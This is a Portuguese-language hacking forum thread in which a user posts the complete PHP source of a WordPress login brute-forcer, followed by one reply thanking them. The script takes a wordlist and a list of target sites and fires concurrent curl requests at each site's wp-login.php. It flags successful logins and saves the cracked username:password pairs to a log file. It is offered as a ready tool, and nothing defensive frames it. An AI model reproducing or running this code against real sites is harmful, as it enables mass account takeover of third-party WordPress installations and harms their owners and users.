Web Wordpress Brute Force

n4sss

Elite Hacker

Registrado em: Aug 2010

Posts: 233
- Share
- Tweet
Font Size

#1

Tools Web Wordpress Brute Force

24-08-2013, 17:51

Script web para brute em wordpress.

Code:

Código PHP:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Wp Brute force</title> <style type="text/css"> body { margin: 0px; padding: 0px; background: #F6F4F3; font-family: 'Source Sans Pro', sans-serif; font-size: 12pt; font-weight: 400; color: #4E4D4D; text-align: center; } .container {tvlw m width: 1000px; margin-top: 10px; margin-right: auto; margin-bottom: 10px; margin-left: auto; color: #999; font-family: Verdana, Geneva, sans-serif; font-size: 12px; } table.bordasimples tr td { border: 1px dashed #4169E1; } table.main tr td { border: 1px dashed #000; } textarea { resize: none; } #copyright p { letter-spacing: 0.20em; text-align: center; text-transform: uppercase; font-size: 0.80em; color: #6F6F6F; } </style> </head> <?php flush(); ?> <body><div id="copyright" class="container"> <table align="center" class="main"> <tr> <td> <div id="copyright2" class="container"> <center> <p> WORDPRESS BRUTE FORCE BY N4SSS<br><br> <form method="post" action=""> <p>USERNAME: <input name="username" type="text" value="admin" maxlength="10" /> <p>PASS THREADS: <select name=threads> <option name=one value="1"> 1 </option> <option name=two value="5" selected> 5 </option> <option name=three value="10"> 10 </option> <option name=four value="15"> 15 </option> </select> <p>WORDLIST FILE: <input name="wordlist" type="text" value="wordlist.txt" maxlength="30" /> <br> <p>LOG_FILE: <input type="text" name="log" id="textfield" value="wp_ok.txt" /> </tr></td></table> <br /> <br /> <p>SITE LIST:<br /> <textarea name="sites" cols="50" rows="20"></textarea> <br /> <input class="container" name="submit" type="submit" value="DO THE BRUTE" /> </form></center> <br /> <br /> <br /> <p>Janissaries team<br /> HTTP://JANISSARIES.ORG</p> </div> </div> </body> </html> <?php /* * Wordpress Brute Force by n4sss * -> Twitter: @n4sss * -> Contact: n-l4b@hotmail.com * -> http://janissaries.org * */ set_time_limit(0); error_reporting(0); function save_content($content, $file){ $fp = fopen($file, "a"); fwrite($fp, $content."\r\n"); fclose($fp); flush(); } function la_brute($url, $username, $wordlist, $thread, $log){ $multi = curl_multi_init(); $bol = array_chunk($wordlist,$thread); $c = 1; if(!preg_match('/http/', $url)) $url = 'http://'.$url; echo 'Bruting '.$url.'<br>'; foreach($bol as $password){ for($i=0;$i<=count($password)-1;$i++){ $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, $url.'/wp-login.php'); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch[$i], CURLOPT_TIMEOUT, 10); curl_setopt($ch[$i], CURLOPT_COOKIEJAR, 'nx.cookie'); curl_setopt($ch[$i], CURLOPT_POST, TRUE); curl_setopt($ch[$i], CURLOPT_REFERER, $url.'/wp-admin/'); curl_setopt($ch[$i], CURLOPT_POSTFIELDS, 'log='.$username.'&pwd='.$password[$i].'&wp-submit=Log%20In&redirect_to='.$url.'/wp-admin/&testcookie=1'); curl_multi_add_handle($multi, $ch[$i]); }do{ curl_multi_exec($multi, $handl);usleep(1); } while($handl>0); foreach($ch as $ch_id => $output){ $result[$ch_id] = curl_multi_getcontent($output); curl_multi_remove_handle($multi, $output); if(preg_match('/general.php/si',$result[$ch_id])){ echo '<table align="center" class="main">'; echo '<tr>'; echo '<td><font color="#EE3B3B">[+] Bruted =><br></font></td>'; echo '<td>'.$url.' => '.$username.':'.$password[$ch_id].'<br>'; echo 'Saving to '.$log.'<br></td></tr></table>'; save_content("$url => $username:$password[$ch_id]", $log); flush(); } } } } if($_POST){ if(!function_exists(curl_init)) die('<font color="red">[-] Not Curl HERE!<br></font>'); $username = trim($_POST['username']); $thread = trim($_POST['threads']); $wordlist = array_filter(file($_POST['wordlist'])); if(!is_file($_POST['wordlist'])) die('<font color="red">[-] File '.$_POST['wordlist'].' not found!</font><br>'); $log = trim($_POST['log']); $urlz = array_filter(explode("\r\n", $_POST['sites'])); foreach($urlz as $url){ la_brute($url, $username, $wordlist, $thread, $log); } } ?>

Youtube:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

n4sss@m4g1cl4b~#$I
just this.
Similar Threads
ELearnSecurity Full Courses

Olá! Já sou hacker?

IoT security from entry to entry

Web Fuzzing Attack Against BlackWater

Offensive Security - Advanced Web Attacks and Exploitation [AWAE]
Tags: php, wordpress

Top
Hifterbuk

Membro

Registrado em: Mar 2012

Posts: 54
- Share
- Tweet
Font Size

#2

24-08-2013, 18:41

Muito bom! Valeu!

Skype: hifterbuk
youtube.com/user/hifterbukbr
Top
Comment

Unconfigured Ad Widget

Anúncio

Tools Web Wordpress Brute Force

Similar Threads

Comment